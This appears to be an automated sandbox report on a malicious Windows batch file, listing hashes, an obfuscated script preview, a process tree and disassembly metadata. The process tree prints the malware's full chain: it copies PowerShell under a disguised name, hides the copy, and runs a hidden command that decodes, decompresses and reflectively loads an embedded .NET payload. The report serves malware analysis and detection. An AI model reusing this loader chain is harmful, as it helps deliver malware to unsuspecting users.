                                                                      SHA512:95796ba0316e025e8f7003d150236b7fd14cc86d62c0cf4c898040aed98c3f33376d58f4b328c758c8027a434b4f5f8b50b24cc47026ad4369f8b5ab52e4838b
                                                                      SSDEEP:24576:tza2nxms2yzntn31+lHWfeOLMlMooMk3heq32vIqfouzVCUjl8oFl15uH4U2BCuQ:xaOfL86eI2/fou3hv6Y6uasvT8J6m/
                                                                      TLSH:179533569E9A2C088AC8815F617F8E2C07F69FBDC90CE3E947E854DB268DF8249D3151
                                                                      File Content Preview:@chcp 65001..set "..............=C:\Win"..:: Ogqxynm Lnzzfbswvs Kiggxbb..:: Qrrbsujxgvh..:: Zimjuett Rsqlwn..set "............=\power"..set "..............=shell."..set "................=erShel"..:: Bmvusdkhlrx Wqswxnfl Vytzllg..set "..........= | xco"..:

                                                                      File Icon

                                                                      Icon Hash:9686878b929a9886

                                                                      Network Behavior

                                                                      No network behavior found

                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:05:46:40
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\INQ24-0122070030786451.bat" "
                                                                      Imagebase:0x7ff7e7220000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:1
                                                                      Start time:05:46:40
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:05:46:40
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\System32\chcp.com
                                                                      Wow64 process (32bit):false
                                                                      Commandline:chcp 65001
                                                                      Imagebase:0x7ff7ac220000
                                                                      File size:14'848 bytes
                                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:05:46:41
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo F "
                                                                      Imagebase:0x7ff7e7220000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:4
                                                                      Start time:05:46:41
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\System32\xcopy.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu
                                                                      Imagebase:0x7ff669340000
                                                                      File size:50'688 bytes
                                                                      MD5 hash:39FBFD3AF58238C6F9D4D408C9251FF5
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:6
                                                                      Start time:05:46:41
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\System32\attrib.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:attrib +s +h C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu
                                                                      Imagebase:0x7ff7c39c0000
                                                                      File size:23'040 bytes
                                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:7
                                                                      Start time:05:46:41
                                                                      Start date:13/12/2024
                                                                      Path:C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu -WindowStyle hidden -command "$Hohcwatlus = get-content 'C:\Users\user\Desktop\INQ24-0122070030786451.bat' | Select-Object -Last 1; $Qlhoh = [System.Convert]::FromBase64String($Hohcwatlus);$Mvwalaytoyd = New-Object System.IO.MemoryStream( , $Qlhoh );$Myhbvcux = New-Object System.IO.MemoryStream;$Uvlejdiywlp = New-Object System.IO.Compression.GzipStream $Mvwalaytoyd, ([IO.Compression.CompressionMode]::Decompress);$Uvlejdiywlp.CopyTo( $Myhbvcux );$Uvlejdiywlp.Close();$Mvwalaytoyd.Close();[byte[]] $Qlhoh = $Myhbvcux.ToArray();[Array]::Reverse($Qlhoh); $Rbyymtwxmx = [System.AppDomain]::CurrentDomain.Load($Qlhoh); $Qokucu = $Rbyymtwxmx.EntryPoint; $Qokucu.DeclaringType.InvokeMember($Qokucu.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
                                                                      Imagebase:0x9f0000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2143947753.000000000A770000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2114245820.00000000057CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2137479439.0000000009711000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2114245820.0000000005397000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Executed Functions

                                                                        Function 0A767B98 Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2143753504.000000000A760000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A760000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_a760000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Te]q
                                                                        • API String ID: 0-52440209
                                                                        • Opcode ID: 9a36e5cae368d52e2697a624c16845a4e56fdb7444a6c0356a2ff304c10c1e14
                                                                        • Instruction ID: 8ae536a3336a55131babea7de8c7596029eab46ac09cf1b87fc9d3918795f97b
                                                                        • Opcode Fuzzy Hash: 9a36e5cae368d52e2697a624c16845a4e56fdb7444a6c0356a2ff304c10c1e14
                                                                        • Instruction Fuzzy Hash: 99B1E570E04218DFDB68CF69C544BADBBF2BF48344F1084A9D809AB251DB745D89CF50
                                                                        Function 0A767B88 Relevance: 1.5, Strings: 1, Instructions: 245COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2143753504.000000000A760000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A760000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_a760000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Te]q
                                                                        • API String ID: 0-52440209
                                                                        • Opcode ID: f745515441a0ead918368779ba018e4aa743854ddd99c819731b9b001c079c81
                                                                        • Instruction ID: 199b2237780f7b155c3b7341441f9e85597baab8a867cd3d4866bf3de65fa5e2
                                                                        • Opcode Fuzzy Hash: f745515441a0ead918368779ba018e4aa743854ddd99c819731b9b001c079c81
                                                                        • Instruction Fuzzy Hash: A7B1D4B4E01218DFDB68CF69D944BADBBF2BF88344F1480A9D809AB351DB745989CF50
                                                                        Function 0A831820 Relevance: .3, Instructions: 266COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2144734678.000000000A830000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: true
                                                                        • Associated: 00000007.00000002.2143947753.000000000A770000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_a770000_INQ24-0122070030786451.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d7bf2db096647d50bc0dead8b41383bdc7bebd80fad8cb1e37d33b9c20a39d21
                                                                        • Instruction ID: dcb12cb097307b39741a95ff57a5a99a9cee9c0838421846d97cee0e240c80f8
                                                                        • Opcode Fuzzy Hash: d7bf2db096647d50bc0dead8b41383bdc7bebd80fad8cb1e37d33b9c20a39d21
                                                                        • Instruction Fuzzy Hash: 37B17071E14209DFDF10CFA9C88979DBBF2AF88B14F148629D819E7294EB749845CF81
                                                                        Function 0724F4C8 Relevance: .2, Instructions: 199COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2127948572.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7240000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ad0141c823e81c6d3dea5ecc47a5bb5922912367a0b80a080b07921c1d66451a
                                                                        • Instruction ID: 6d7325ac08f6391cf62c158b3f2f5efc4b3f4c01f25517a319f5aea4171d7733
                                                                        • Opcode Fuzzy Hash: ad0141c823e81c6d3dea5ecc47a5bb5922912367a0b80a080b07921c1d66451a
                                                                        • Instruction Fuzzy Hash: DE912FB0A34105DFD718CF58D1C8B9AB3F2EB88310F19C665D815ABA95D3B4EA85CF50
                                                                        Function 07BD1D88 Relevance: 14.1, Strings: 11, Instructions: 336COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2131099028.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7bd0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 84el$84el$84el$84el$tP]q$tP]q$tP]q$tP]q$$]q$$]q$$]q
                                                                        • API String ID: 0-1630207118
                                                                        • Opcode ID: 16fb6f497ccce9de67fa13e1c1e44d56c4723d6651051aea03d5a582d6b1e341
                                                                        • Instruction ID: f8cee388e9375ef6e72c668139551dc2fd84438ef941d4faf95c6faaeaaa41a4
                                                                        • Opcode Fuzzy Hash: 16fb6f497ccce9de67fa13e1c1e44d56c4723d6651051aea03d5a582d6b1e341
                                                                        • Instruction Fuzzy Hash: 21C1C4B0A0025EDFEB15DF58C845BAA7BF2FF89710F2584A5E5019B251D731DC81CBA1
                                                                        Function 07BD12D0 Relevance: 9.1, Strings: 7, Instructions: 396COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2131099028.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7bd0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q$Te]q$Te]q$Te]q
                                                                        • API String ID: 0-2669608612
                                                                        • Opcode ID: c89323362777c3f4f7d7d884b2422725bf494dca49d2ae03ae80803e2edf2d3d
                                                                        • Instruction ID: 0f22d8fdbe3ed35983013931b0380d34611bed8c6eb958a254d7a9bc83bfb4e8
                                                                        • Opcode Fuzzy Hash: c89323362777c3f4f7d7d884b2422725bf494dca49d2ae03ae80803e2edf2d3d
                                                                        • Instruction Fuzzy Hash: BFD1C3F0B1420E9FEB249F6DC45466ABBE6EF85210F1584EAD445CB251FB31CC81CBA1
                                                                        Function 07BD0C40 Relevance: 9.1, Strings: 7, Instructions: 356COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2131099028.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7bd0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Te]q$XX]q$XX]q$XX]q$XX]q$XX]q$XX]q
                                                                        • API String ID: 0-3177977632
                                                                        • Opcode ID: 0bbba3b543528b9f0b027e2984b136480f741009d3691a1d9c27c66c7c88ae79
                                                                        • Instruction ID: b09af9489d548f9b05ad9e3c206293319de20dace055e61e855a0e7ab50e2f20
                                                                        • Opcode Fuzzy Hash: 0bbba3b543528b9f0b027e2984b136480f741009d3691a1d9c27c66c7c88ae79
                                                                        • Instruction Fuzzy Hash: 81B129F1B142069FEB246B3884517BA7BE2DF89310F2484AAD405CB291EF72CD80CB65
                                                                        Function 07BD1D6F Relevance: 7.7, Strings: 6, Instructions: 201COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2131099028.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7bd0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 84el$84el$tP]q$tP]q$$]q$$]q
                                                                        • API String ID: 0-776319696
                                                                        • Opcode ID: ce1e42e79e66ff9e92b8933cf8b725810b8c2d7615fb2063b3efd616ad67cbe4
                                                                        • Instruction ID: 0e3aadc0b348893dfc8f00c6ac10bdef6ef0e51c1b06ca911719bbe0a3ea3c2f
                                                                        • Opcode Fuzzy Hash: ce1e42e79e66ff9e92b8933cf8b725810b8c2d7615fb2063b3efd616ad67cbe4
                                                                        • Instruction Fuzzy Hash: C5714DB0A0024EDFEB25CE58C545BAABBE2FB49710F1A84E5E5059B251E731DC81CB91
                                                                        Function 08FF9CB8 Relevance: 5.4, Strings: 4, Instructions: 395COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2136119161.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_8ff0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (aq$(aq$Haq$Haq
                                                                        • API String ID: 0-3615112956
                                                                        • Opcode ID: aa569c2dd50e0726e91c1bd955a6f1f6d820348947d127b3b6cefbf55a797c04
                                                                        • Instruction ID: 2567edb175aef89b6cbee5df69a3ff27dce26dcbb5aa2f2ff2912c36845e84c8
                                                                        • Opcode Fuzzy Hash: aa569c2dd50e0726e91c1bd955a6f1f6d820348947d127b3b6cefbf55a797c04
                                                                        • Instruction Fuzzy Hash: EEE1C030B00256CFCB15DF39C490AAE7BB2FF84305B158569E9498B3A2DB74ED46CB91
                                                                        Function 08FF94F0 Relevance: 4.2, Strings: 3, Instructions: 490COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2136119161.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_8ff0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Haq$Haq$Haq
                                                                        • API String ID: 0-3013282719
                                                                        • Opcode ID: 7e9e2b8ca01eca738340d254cb5f237ffed837a156f60a483ca263b3c77ca4c5
                                                                        • Instruction ID: 9272571b601c7ea2c1bd75bff75ef9ba67ad4d7a3e151a295bee608edc68c706
                                                                        • Opcode Fuzzy Hash: 7e9e2b8ca01eca738340d254cb5f237ffed837a156f60a483ca263b3c77ca4c5
                                                                        • Instruction Fuzzy Hash: E3124974B00209CFCB25DFB5D884A6EBBB2FF88301B14852DE5469B362DB75AC46CB50
                                                                        Function 08FFB220 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2136119161.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_8ff0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q
                                                                        • API String ID: 0-705557208
                                                                        • Opcode ID: 334dd27d054bcfa2b7fbfde567d3197f309104172d6c94b2c72f42e2d4c2f6b2
                                                                        • Instruction ID: 0eb8d85c975360d10c1b0875c52a1289d246c09b31523b7f602ee16d459414d5
                                                                        • Opcode Fuzzy Hash: 334dd27d054bcfa2b7fbfde567d3197f309104172d6c94b2c72f42e2d4c2f6b2
                                                                        • Instruction Fuzzy Hash: C6F1C934A10218CFCB04EFA4D994A9DB7B2FF88311F558168E506AB3B6DB71EC46CB50
                                                                        Function 08FFF800 Relevance: 4.1, Strings: 3, Instructions: 358COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2136119161.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_8ff0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (aq$(aq$Haq
                                                                        • API String ID: 0-2456560092
                                                                        • Opcode ID: eaefaa95fb4e4f1c960420fdc5e02d19399b46a17932b00b8cf7ead8958ec403
                                                                        • Instruction ID: 6516d62dfd206f606d059a6816a2c06e45265bdec071277bd2af10f9d8db2ad6
                                                                        • Opcode Fuzzy Hash: eaefaa95fb4e4f1c960420fdc5e02d19399b46a17932b00b8cf7ead8958ec403
                                                                        • Instruction Fuzzy Hash: 4FE12F34A00209DFCB14EF74D8949AEBBB2EF89311F108569E905AB365DF34ED46CB91
                                                                        Function 07BD0C23 Relevance: 3.9, Strings: 3, Instructions: 136COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2131099028.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7bd0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Te]q$XX]q$XX]q
                                                                        • API String ID: 0-2591805259
                                                                        • Opcode ID: 23748cacee38bfc812e2a9d1f6796e156b62ba78d85e1cc8309078ea50af2b82
                                                                        • Instruction ID: a98540bba6d4bb15e8f7af5480a0cb2b8ae98e7a55c25128af8ae41b042f645c
                                                                        • Opcode Fuzzy Hash: 23748cacee38bfc812e2a9d1f6796e156b62ba78d85e1cc8309078ea50af2b82
                                                                        • Instruction Fuzzy Hash: C04115F0B14205DBFB247E3094517B97BE2DF85650F5844EAD8008B291FB76DD80CB66
                                                                        Function 07BD4020 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2131099028.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7bd0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q
                                                                        • API String ID: 0-3120983240
                                                                        • Opcode ID: a7b083313318c4e24ad9632869957eef2026a528e3494557665c4013e9b45d4c
                                                                        • Instruction ID: a13a83f87a4b10460bd01b7d4e2cf7ce2c1d9ca44799aa03aed51fd761fdb344
                                                                        • Opcode Fuzzy Hash: a7b083313318c4e24ad9632869957eef2026a528e3494557665c4013e9b45d4c
                                                                        • Instruction Fuzzy Hash: 2142D8B4E1024ECFEB14DFA4D4486ADBBB1FB89305F1040A9E916AB354EB785D81CF61
                                                                        Function 07BD4B48 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2131099028.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7bd0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q
                                                                        • API String ID: 0-3120983240
                                                                        • Opcode ID: 08fe4938718d34aca012213c0d5f7fe7be74c2e45de92e9d7833f17b55824600
                                                                        • Instruction ID: 1d8f178917a585abd346485bad6c88c19f7e820741b3c19256a87d901e7c967c
                                                                        • Opcode Fuzzy Hash: 08fe4938718d34aca012213c0d5f7fe7be74c2e45de92e9d7833f17b55824600
                                                                        • Instruction Fuzzy Hash: FEF1D4B4D01259DFDB18DFA4E4986EDBBB2FF89301F10406AE816AB260EB755D81CF00
                                                                        Function 08FF8BE8 Relevance: 2.9, Strings: 2, Instructions: 355COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2136119161.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_8ff0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (aq$d
                                                                        • API String ID: 0-3557608343
                                                                        • Opcode ID: 849037e74413aa7931e2820157f585c1c13093409d585cb17be3106021400278
                                                                        • Instruction ID: a033c6c8d64a2335268e7c16f709c912084ecd453cab20c08af96bfb11d9ca15
                                                                        • Opcode Fuzzy Hash: 849037e74413aa7931e2820157f585c1c13093409d585cb17be3106021400278
                                                                        • Instruction Fuzzy Hash: 7ED18E35700606CFCB14DF68C88496AB7F2FF88351B158969D55A9B7A2DB30F846CB90
                                                                        Function 08FF6D60 Relevance: 2.7, Strings: 2, Instructions: 246COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2136119161.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_8ff0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (_]q$Pl]q
                                                                        • API String ID: 0-1204573693
                                                                        • Opcode ID: e553ec8a08872b2451d14fd7a793f6379ab16cf58ba11232deaa1ac10048ced4
                                                                        • Instruction ID: b8f0a26e5fcf5903b0b26438b1a7fcffaf53fb9c15629993c0fcb9a67fee60bc
                                                                        • Opcode Fuzzy Hash: e553ec8a08872b2451d14fd7a793f6379ab16cf58ba11232deaa1ac10048ced4
                                                                        • Instruction Fuzzy Hash: 36912474B002058FCB15DF68C484AAA7BF6BF89701B1084A9E505CF3B6DB74ED42CB91
                                                                        Function 07BD4820 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2131099028.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7bd0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q
                                                                        • API String ID: 0-3120983240
                                                                        • Opcode ID: 4013500a901a490a0aac010cf37073f37b07c11068eda2f5d4cbbf3e5948afe4
                                                                        • Instruction ID: 9a197e89c404006814a8c50a2ca54908974310dad91e2cb50f3b1a0f5215a25b
                                                                        • Opcode Fuzzy Hash: 4013500a901a490a0aac010cf37073f37b07c11068eda2f5d4cbbf3e5948afe4
                                                                        • Instruction Fuzzy Hash: 5EA1C3B4E0024ACFDB18DFA5D548AADBBB2FB89301F108069E8166B350DB795D46CF50
                                                                        Function 08FF7600 Relevance: 2.6, Strings: 2, Instructions: 146COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2136119161.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_8ff0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (aq$(aq
                                                                        • API String ID: 0-3916115647
                                                                        • Opcode ID: bfc539977d97427c24268c0c9d09cb178562dbb659861d4f8882ad101859f3e8
                                                                        • Instruction ID: 9c90e897753b0f631cbafdc9a64802a495680f74c3abd4f1c56d4db4356436af
                                                                        • Opcode Fuzzy Hash: bfc539977d97427c24268c0c9d09cb178562dbb659861d4f8882ad101859f3e8
                                                                        • Instruction Fuzzy Hash: CF516E3170024A8FDB15AF79D854AAE7BA2EFC4342F148469E905CB2A2DF39DD41C7A1
                                                                        Function 09700AC0 Relevance: 2.6, Strings: 2, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2137399920.0000000009700000.00000040.00000800.00020000.00000000.sdmp, Offset: 095B0000, based on PE: true
                                                                        • Associated: 00000007.00000002.2136187409.00000000095B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_95b0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (aq$Haq
                                                                        • API String ID: 0-3785302501
                                                                        • Opcode ID: 99622a62aadcc4ff21eec46710d0c5d4e293b7c7619b2e441878401cdbafa950
                                                                        • Instruction ID: 636db1f5f0da37a12481c9129f1bf6ede0833650b2d9f520c673f48aca958e7d
                                                                        • Opcode Fuzzy Hash: 99622a62aadcc4ff21eec46710d0c5d4e293b7c7619b2e441878401cdbafa950
                                                                        • Instruction Fuzzy Hash: F62107353082418FC706AB79D86066F7BA7AFC5300B14406AE549CF3E2DE388D46C3A1
                                                                        Function 0A7602E1 Relevance: 2.6, Strings: 2, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2143753504.000000000A760000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A760000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_a760000_INQ24-0122070030786451.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: '$y
                                                                        • API String ID: 0-443720009
                                                                        • Opcode ID: f13dfb4b0109d7e967e2e592ff8b6a01d9b1d86856b94ff7dc23b8bf1f095eb4
                                                                        • Instruction ID: 7b7d0b3559714819aad5b55f5640e72fd96912458129dbe759e03ac79ae4bef0
                                                                        • Opcode Fuzzy Hash: f13dfb4b0109d7e967e2e592ff8b6a01d9b1d86856b94ff7dc23b8bf1f095eb4
                                                                        • Instruction Fuzzy Hash: 7921A474D11229DFCB65EF24DC94B9DB7BABB48300F4092D9D90967291DB305E84DF90
                                                                        Function 07BD0DA4 Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2131099028.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7bd0000_INQ24-0122070030786451.jbxd
                                                                        Similarity
